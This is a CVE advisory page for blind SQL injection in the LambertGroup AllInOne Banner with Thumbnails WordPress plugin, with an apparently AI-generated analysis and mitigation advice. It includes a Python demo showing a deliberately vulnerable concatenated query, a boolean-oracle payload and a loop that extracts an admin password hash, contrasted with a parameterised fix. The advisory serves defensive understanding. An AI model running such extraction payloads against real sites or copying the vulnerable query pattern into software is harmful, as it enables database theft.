CVE-2025-60108
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup LambertGroup - AllInOne - Banner with Thumbnails all-in-one-thumbnailsBanner allows Blind SQL Injection. This issue affects LambertGroup - AllInOne - Banner with Thumbnails: from n/a through <= 3.8.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The LambertGroup AllInOne Banner with Thumbnails WordPress plugin, versions up to and including 3.8, is vulnerable to blind SQL injection; the cited reference reports it as exploitable without authentication [1].
Analysis
The LambertGroup - AllInOne - Banner with Thumbnails WordPress plugin, up to and including version 3.8, contains a SQL injection flaw (CWE-89, Improper Neutralization of Special Elements used in an SQL Command). Attacker-controlled input reaches a database query without being sanitized or bound as a parameter, so an attacker can change the structure of the query the plugin executes. The injection is blind: the query's result is not reflected in the response, so the attacker learns about the database only through side effects such as whether a page element renders or how long the response takes. The CVE description does not name the vulnerable endpoint or parameter; the cited reference states that no authentication is required [1].
Exploitation
The exposed surface is the plugin's request-handling code for banner and thumbnail display; the description does not identify the specific endpoint or parameter. Per the cited reference, an unauthenticated attacker can send crafted HTTP requests carrying SQL payloads to the affected endpoint [1]. Because the injection is blind, the response never contains query output. The attacker instead asks the database yes/no questions and infers the answers from differences in the response (boolean-based) or from deliberately induced delays (time-based), recovering data one character at a time [1].
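The following is an added example, not code from the LambertGroup plugin (which is PHP and is not shown on this page). It models the two halves of the paragraph above: a hypothetical banner lookup that concatenates a request parameter into SQL, and the boolean-based inference loop an attacker runs against it, followed by the same loop failing against a parameterised version of the lookup. The table names, the `banner_id` parameter, the admin row and the password hash are all constructed stand-ins; sqlite3 stands in for MySQL, whose equivalents of the probe functions are `ORD()` and `SUBSTRING()`, and whose `SLEEP()` would be the time-based variant that SQLite lacks.

```python
"""Boolean-based blind SQL injection against a concatenated query, and the
same probe failing against a parameterised query.

Everything here is constructed for the demo: table names, the banner lookup,
the parameter name and the password hash are invented stand-ins, not taken
from the LambertGroup plugin.  sqlite3 stands in for MySQL.
"""
import sqlite3
import string


def make_db():
    # Constructed in-memory stand-in for a WordPress database.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE banners (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO banners VALUES (1, 'Spring sale'), (2, 'New arrivals');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BfakeHashValueForDemoOnly');
    """)
    return conn


def vulnerable_lookup(conn, banner_id):
    """Hypothetical vulnerable pattern: a request parameter (e.g. ?banner_id=)
    is concatenated straight into the SQL text.  Returns only whether a banner
    was found, which is all a blind attacker gets to observe."""
    sql = f"SELECT title FROM banners WHERE id = {banner_id}"
    return len(conn.execute(sql).fetchall()) > 0


def hardened_lookup(conn, banner_id):
    """Hardened form: the value is cast to an integer and bound as a parameter.
    In WordPress the equivalent is $wpdb->prepare('... WHERE id = %d', $id)."""
    try:
        bid = int(banner_id)
    except (TypeError, ValueError):
        return False
    rows = conn.execute("SELECT title FROM banners WHERE id = ?", (bid,)).fetchall()
    return len(rows) > 0


def probe(position, ch):
    """Boolean oracle payload: the banner renders only if character `position`
    of the admin password hash equals `ch`.  unicode()/substr() are the SQLite
    forms of MySQL ORD()/SUBSTRING()."""
    return (f"1 AND (SELECT unicode(substr(user_pass, {position}, 1)) "
            f"FROM wp_users WHERE user_login = 'admin') = {ord(ch)}")


def extract_blind(lookup, conn, max_len=64):
    """Recover the admin hash one character at a time through the yes/no oracle.
    Returns '' when no probe ever succeeds, i.e. the payload never alters the query."""
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if lookup(conn, probe(pos, ch)):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of string, or injection blocked
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", repr(extract_blind(vulnerable_lookup, db)))
    print("hardened lookup leaks:  ", repr(extract_blind(hardened_lookup, db)))
```

The attacker never sees the hash in any response; each request answers one question ("is character 3 of the hash equal to `$`?") and the loop assembles the answers. Against the hardened lookup every probe fails to parse as an integer, so the query is never altered and the loop returns nothing, which is the behaviour a fixed plugin release should exhibit.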
Impact
Successful exploitation lets an attacker read data from the WordPress database through the injected query. This can expose user account data including password hashes from the users table, post content and configuration values such as those stored in the options table. The cited reference states that the vulnerability is being exploited in mass campaigns that target sites regardless of their traffic or popularity [1].
Mitigation
As of the advisory date, users are urged to update the plugin to a patched version. Note that the CVE description gives no fixed version (the affected range is stated only as "<= 3.8") and this page lists no patch, so administrators should check the plugin's changelog for a release later than 3.8 and, if none is available, deactivate or remove the plugin until one is. Site administrators who cannot update themselves should contact their hosting provider or web developer for assistance. The cited reference assigns a CVSS v3 score of 8.5 (High), reflecting the risk of data theft and unauthorized database access [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <= 3.8
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.